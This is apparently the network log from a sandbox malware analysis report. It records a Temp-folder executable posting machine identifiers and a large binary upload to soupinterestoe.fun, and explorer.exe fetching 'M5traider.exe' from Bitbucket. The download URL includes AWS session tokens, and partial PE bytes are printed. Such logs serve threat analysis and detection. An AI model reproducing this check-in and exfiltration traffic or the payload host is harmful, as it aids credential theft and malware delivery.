Dec 27, 2023 18:13:48.030164957 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=grdj90h7kp32fae4ee5lu9uiu3; expires=Sun, 21-Apr-2024 11:00:26 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mG0MPhLS%2FBgTzCdOzc5fmKk4GERiEuk%2FJiWULWklp7XpG11lP9ZQkHuZbWAHGFpa6pc1sCvrEQtt1jer8R1ye4eYaGC62gMy8rsj9UvkvHoIztKu%2BTL2%2BwqZDeZEq5YaX2wl474%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c332392 Data Raw: Data Ascii:
Dec 27, 2023 18:13:48.030179977 CET	41	IN	Data Raw: 66 33 36 62 37 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: f36b71-DFW15Malformed packet data
Dec 27, 2023 18:13:48.030190945 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49840	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:48.328583002 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:48.328872919 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:48.878788948 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=i7ckv6fbcli6vjfe2r73e62o8l; expires=Sun, 21-Apr-2024 11:00:27 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BqGRdoCor%2F2RuE0VcJ7ybSj7Mt6W%2BcJOeDdInilYgl3z7FUWVJF5f7guWbEO6QakDUyDmnF50oRqLmvxnodZxkHTgsuwECLUO38V4DMZPS1bM1pl5OZj2CsLYgn0mrWIHyxDpeM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3323d798 Data Raw: Data Ascii:
Dec 27, 2023 18:13:48.878801107 CET	39	IN	Data Raw: 34 36 39 35 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 4695-DFW15Malformed packet data
Dec 27, 2023 18:13:48.878817081 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49841	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:49.103976011 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:49.104216099 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:49.482314110 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=i1gfhkagp9lsor1d4fq9f5hb20; expires=Sun, 21-Apr-2024 11:00:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vb0GUc2%2FGKTlsgXeS%2FNoL83hzTd3xVsFs%2FQ4y4y7HRTS4QMxEL4%2BLlNjw047yFkmMY6DbWBmuXNCouoVXUkQBJnUpHdXNTwXHv8k4UaX1zMOXlfyhl7TnEDogFNB2sx0%2B70CkNE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3324 Data Raw: Data Ascii:
Dec 27, 2023 18:13:49.482328892 CET	43	IN	Data Raw: 34 65 35 34 36 62 38 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 4e546b89-DFW15Malformed packet data
Dec 27, 2023 18:13:49.482340097 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49843	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:52.516120911 CET	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 452892 Host: soupinterestoe.fun
Dec 27, 2023 18:13:52.516483068 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:52.637440920 CET	1286	OUT	Data Raw: bb 77 52 8f ae cd ff ec 1e d8 06 ff 33 bd cf 8c d5 fc b2 fc af b1 3e 58 c4 ff 16 b7 bc e6 e2 29 f7 5b 9c db 0b 9b f7 49 ab e3 e3 75 e5 c4 1a be 88 0d 2e 52 c4 f2 d2 ea f4 ca 56 eb 8b f7 14 67 f9 5f 59 e5 33 47 fb 7a 7f f6 75 08 8d f9 1f ce ff 5c Data Ascii: wR3>X)[Iu.RVg_Y3Gzu\\\\j_?u`sW5Z"Wo}CR[EjMOQ</b}bD"3/b)sVaZc-tXt9sO_
Dec 27, 2023 18:13:52.637805939 CET	2572	OUT	Data Raw: ea af c6 6d d1 a3 ee de bc a2 1f c7 6f d9 4f 07 fb 27 8d 1c a4 f7 e5 09 af 43 70 af bb 86 97 d5 9d 9b 95 d4 dd 9b 79 c7 87 7b f7 db 62 40 98 f1 9b f7 d7 fb 18 6c 9b c7 ee 1a 56 51 77 6e 5a 56 e3 36 f3 de f3 70 ef d8 e6 03 c3 60 fb ee 61 de 39 9b Data Ascii: moO'Cpy{b@lVQwnZV6p`a9;7[}F%}L_7\|!uIq?_Wt\y?d@$Gs6q;~_^Y;7x>~=z?+8nI6q/E
Dec 27, 2023 18:13:52.637830019 CET	7716	OUT	Data Raw: fc cf f9 5f cb fd 2f cd 00 9d ff 39 ff 6b a3 ff d1 f4 e4 9a 7e dc 86 07 da d6 ff 33 e7 7f c8 f5 fe 62 eb 01 1a eb fe d9 fc 2f 3d fd 63 33 3e 92 ec cf e6 7f 49 33 40 78 3e ec ef ae 61 15 1d 3a a0 9e fd 1b 18 1f 67 fb 26 46 ac e7 c7 de 5f da 1e 9f Data Ascii: _/9k~3b/=c3>I3@x>a:g&F_X+ ?F]6WzB!g+g"0<f%0?1i{<`9r.{a:k:s*q?9s/_9ja72cdhzr[>m[4j
Dec 27, 2023 18:13:52.637892962 CET	12860	OUT	Data Raw: eb ed e5 fa 7f dc e7 cf f9 2d c7 66 ff d2 ff e8 7d e8 e7 e5 9a 7f 69 f6 27 fb 7f cd d9 bf a1 07 6e 33 48 07 e6 37 79 e4 40 1d 73 26 08 1c 4f 5a 20 cf 35 fb 82 65 1f b1 bc 1e fe 27 67 f9 9a eb ff d9 66 81 f0 dc ea 9a 80 be 01 de b5 59 c9 df c6 ec Data Ascii: -f}i'n3H7y@s&OZ 5e'gfY_1>^<NrBQ(\/Od]kX:?n7{}e<#V.1XaG?l6U{yq(NigkgzS*OFFY?
Dec 27, 2023 18:13:52.759053946 CET	7716	OUT	Data Raw: 3a da ff 0c 07 74 fe e7 fc af b5 fe 57 0a d2 99 f3 3f 9e f2 8c 2f 57 e0 7e 41 9e d4 ee 57 5f 9e 38 a0 14 c4 f9 5f 27 f5 ff d6 e4 7f 22 53 76 2e eb 99 c0 cc fd bb 54 ac c1 79 a6 ff e5 b1 bf a4 9a c0 a4 59 20 7a 06 48 ca 1c 10 73 ce 47 b2 ef c5 fd Data Ascii: :tW?/W~AW_8_'"Sv.TyY zHsG/SomrtDh?Z O(sm5/)>3?3fG#9?6(2g?s!<a/Ok'gn]kc~ .:]5
Dec 27, 2023 18:13:52.759092093 CET	2572	OUT	Data Raw: fd df f8 2d 2a a1 17 66 ad f7 67 7b 2e af 81 07 6a 0b 14 3d bd 34 3d d9 df 2b 67 83 b0 16 90 3d c1 66 ff af ec f9 35 6d cf f4 3f b3 6e 90 09 af 31 ea fc 58 eb 27 d7 02 e4 5a 7f b2 3e 50 ae ff 27 7b 79 cd d0 07 19 39 0b c4 b6 f6 9f 3c 97 9e 27 7d Data Ascii: -*fg{.j=4=+g=f5m?n1X'Z>P'{y9<'}=\OepwU#kqS_Ogv{rUWI^3mjY.0wy[=03wU][&3H_/s%
Dec 27, 2023 18:13:52.759171963 CET	5144	OUT	Data Raw: ef 7c ae fe f0 c4 4c df fe bc e8 da bf 47 7d fb 43 f6 47 ef af e7 7f 5c f7 ef 0f cf cd 0e 7b 7f fd da bf 79 ea cf 81 ff 1d fd f2 7f 83 de df ff ea de df 13 84 ff 75 73 5a e5 7f a1 fd 5d b4 4a e3 3f 47 0b cd f0 f2 cb 2f 57 9f 37 d1 b4 3e fe f8 63 Data Ascii: \|LG}CG\{yusZ]J?G/W7>cG^zI]r_SU-RYsn'Li6k\M6X2$kZ0Lg`20a~,8!:K:~R9#=5^y
Dec 27, 2023 18:13:52.759330034 CET	18004	OUT	Data Raw: 4f 15 eb 89 8a b2 8a fc 2f f2 bf 45 c4 ff ac 5e 18 42 cf 7f b7 9b e7 0d 31 c0 54 45 cf 9f d5 d3 35 1a 98 ff d5 70 bf c8 ff ea f8 5f 7b 60 45 fe 17 e7 ff 45 fe 17 f9 5f e4 7f 91 ff 45 fe 37 7a ff 1f b3 bf 83 f8 ff 42 ec 6f 52 f8 5f a8 ff e3 a6 77 Data Ascii: O/E^B1TE5p_{`EE_E7zBoR_wznGGW,QKK{9O"?}:Oyizy^1k6?C~.=\|eDy_!8
Dec 27, 2023 18:13:52.759356022 CET	5144	OUT	Data Raw: 62 7a 0d d8 61 27 ef f9 55 a9 27 70 d4 bc 69 da d4 4f 5e 35 aa 7c 86 df a0 ec f0 f9 4c 75 3c 2c f2 bf c5 cd ff 26 cd ef 47 bd 60 f4 fc bf f6 a9 29 e3 7f a3 e7 83 a3 61 79 b6 af 77 dc dc 6f 50 fe 37 30 0f ac f1 f9 0d 32 fb 6f 10 ff 5f 93 ce 8f 7e Data Ascii: bza'U'piO^5\|Lu<,&G`)aywoP702o_~_pz~7L9 cVQu_;~[BkeN*1>,,jjt+!/?:kHw[`VM
Dec 27, 2023 18:13:56.927956104 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=7bi9u44dt6ni690q9ss8pnejc5; expires=Sun, 21-Apr-2024 11:00:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5bI89o3uPCbGEvzun%2Fi9XJaw7XFtUKNASfoZxm1EWH7E%2Fu9K87kQZDe3kT03cAG99yasgxTztBqo4A1DHJt3VZ2bLyMnuwy9X2%2BXHZHqR7X%2FWoEoJ6DLpXh2kxWGmq%2BHkVMFLk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3325 Data Raw: Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.192.141.1	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:18 UTC	209	OUT	GET /testing77777/appdevlompent55555555/downloads/M5traider.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bitbucket.org
2023-12-27 17:12:18 UTC	4272	IN	HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 998748.751 vary: Accept-Language, Origin x-usage-request-cost: 1267.17 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: a918332116546733 x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Wed, 27 Dec 2023 17:12:18 GMT x-usage-user-time: 0.037127 x-usage-system-time: 0.000888 location: https://bbuseruploads.s3.amazonaws.com/1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEOT4ABHX&Signature=YF9rW8DnbyQKixyIQ%2B8saMpTj2U%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJGMEQCIAEHZ9IHbumnCluWuAGp6D4I0JipLPcJElvpuE3YsbgEAiBbsEaLhusUymabYfaV20lB1%2F6XDnjU2qI%2Bov0UnHQWoiqwAgiq%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM2BrEGKpws8pTK%2F01KoQCMQccuPmMzXBQPf5vuQzNPp0wIRDjkBZuDNenA5oPOw9PLcsInDa24UnwuVov0IUd4yHQtxerOEpFSFw4G9cVi8IlKfqvkNZsDoaTAAbrebxv9PwjTrIYmxrf2MmWPnDddqskC3gwylZfs4xQDEO5OKDmESZtLubobXFTW03HuzZ%2FScl7ezDzOGIGDe41IDfz6f6K9msnNbcz1inrcmjv1f%2FPC7053Dfp2ZP8WtofDjwS%2Fi6okRUvC%2FdlVUwrcrbmbPoGKcmseYnHsMvL3i%2B2do2w8YGUjm8p9CqbTRcsVp77kAZPfN%2F2kjmQbeWDsl3yDgo%2Fj98Wq5L6tqdH0wdzSM%2B0LUwwirCxrAY6ngE%2FKEG7WyKZ3tZeCBYm2%2FgG0WquXvA%2FGvuLbx%2B8weTXtEnj50DlgthvBk6wW3fNxEUA4TJDixJM9OCOkhUwZ4U5T7v2H54luwcHT7gF96rq%2Fy%2BAIR5k0CByq8OeZbzPl%2BV5sq%2BvhBTCSfJ6ZcWNzA%2Bzi6HoWGZuNyLp40eL%2Fl0qxo7vvRuX5BT9OjD4tK1VFMekt2w2%2Fm2zOqgXvCNOiw%3D%3D&Expires=1703698194 expires: Wed, 27 Dec 2023 17:12:18 GMT x-served-by: 583a234be3c2 x-envoy-upstream-service-time: 67 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: a918332116546733 x-static-version: a44564505899 x-render-time: 0.041277408599853516 Connection: close x-usage-input-ops: 0 x-version: a44564505899 x-request-count: 1399 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	54.231.140.225	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 17:12:18 UTC	1293	OUT	GET /1bee3bfb-d231-4c42-80c1-836b79e3e5b0/downloads/b6496915-3881-4826-90f1-0b8d8e139169/M5traider.exe?response-content-disposition=attachment%3B%20filename%3D%22M5traider.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEOT4ABHX&Signature=YF9rW8DnbyQKixyIQ%2B8saMpTj2U%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMSJGMEQCIAEHZ9IHbumnCluWuAGp6D4I0JipLPcJElvpuE3YsbgEAiBbsEaLhusUymabYfaV20lB1%2F6XDnjU2qI%2Bov0UnHQWoiqwAgiq%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM2BrEGKpws8pTK%2F01KoQCMQccuPmMzXBQPf5vuQzNPp0wIRDjkBZuDNenA5oPOw9PLcsInDa24UnwuVov0IUd4yHQtxerOEpFSFw4G9cVi8IlKfqvkNZsDoaTAAbrebxv9PwjTrIYmxrf2MmWPnDddqskC3gwylZfs4xQDEO5OKDmESZtLubobXFTW03HuzZ%2FScl7ezDzOGIGDe41IDfz6f6K9msnNbcz1inrcmjv1f%2FPC7053Dfp2ZP8WtofDjwS%2Fi6okRUvC%2FdlVUwrcrbmbPoGKcmseYnHsMvL3i%2B2do2w8YGUjm8p9CqbTRcsVp77kAZPfN%2F2kjmQbeWDsl3yDgo%2Fj98Wq5L6tqdH0wdzSM%2B0LUwwirCxrAY6ngE%2FKEG7WyKZ3tZeCBYm2%2FgG0WquXvA%2FGvuLbx%2B8weTXtEnj50DlgthvBk6wW3fNxEUA4TJDixJM9OCOkhUwZ4U5T7v2H54luwcHT7gF96rq%2Fy%2BAIR5k0CByq8OeZbzPl%2BV5sq%2BvhBTCSfJ6ZcWNzA%2Bzi6HoWGZuNyLp40eL%2Fl0qxo7vvRuX5BT9OjD4tK1VFMekt2w2%2Fm2zOqgXvCNOiw%3D%3D&Expires=1703698194 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bbuseruploads.s3.amazonaws.com
2023-12-27 17:12:19 UTC	543	IN	HTTP/1.1 200 OK x-amz-id-2: kkppp2J22Se1OJ3A5PgOnAtEQAQnO/MscsKrry4CDm62OuJ0/Y79iU1W4sw3EOQpZl3DE46r1E8= x-amz-request-id: 111PYJTGX4B9MR2W Date: Wed, 27 Dec 2023 17:12:20 GMT Last-Modified: Mon, 18 Dec 2023 12:51:01 GMT ETag: "1713300ba962c869477e37e4b31e40af" x-amz-server-side-encryption: AES256 x-amz-version-id: CZX3PlQKZgfZ6VUBuhdBZ2FOGpA5HEt8 Content-Disposition: attachment; filename="M5traider.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 4818944 Connection: close
2023-12-27 17:12:19 UTC	7557	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 7d 29 99 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 2a 48 00 00 5c 01 00 00 00 00 00 1e 48 48 00 00 20 00 00 00 60 48 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 49 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL})P*H\HH `H@ I@
2023-12-27 17:12:19 UTC	16384	IN	Data Raw: 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 16 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 28 f0 12 00 06 13 00 38 e8 ff ff ff 11 00 2a 52 38 02 00 00 00 00 2a 00 02 03 6f 2d 01 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 50 00 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 50 00 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1f 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 30 01 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f 31 01 00 06 38 00 00 00 00 00 2a 32 02 7b 51 00 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 51 00 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1e 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 34 01 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f 35 01 00 Data Ascii: 0 888(8R8o-82{P86}P80 888o08>o182{Q8J8}Q80 888o48>o5
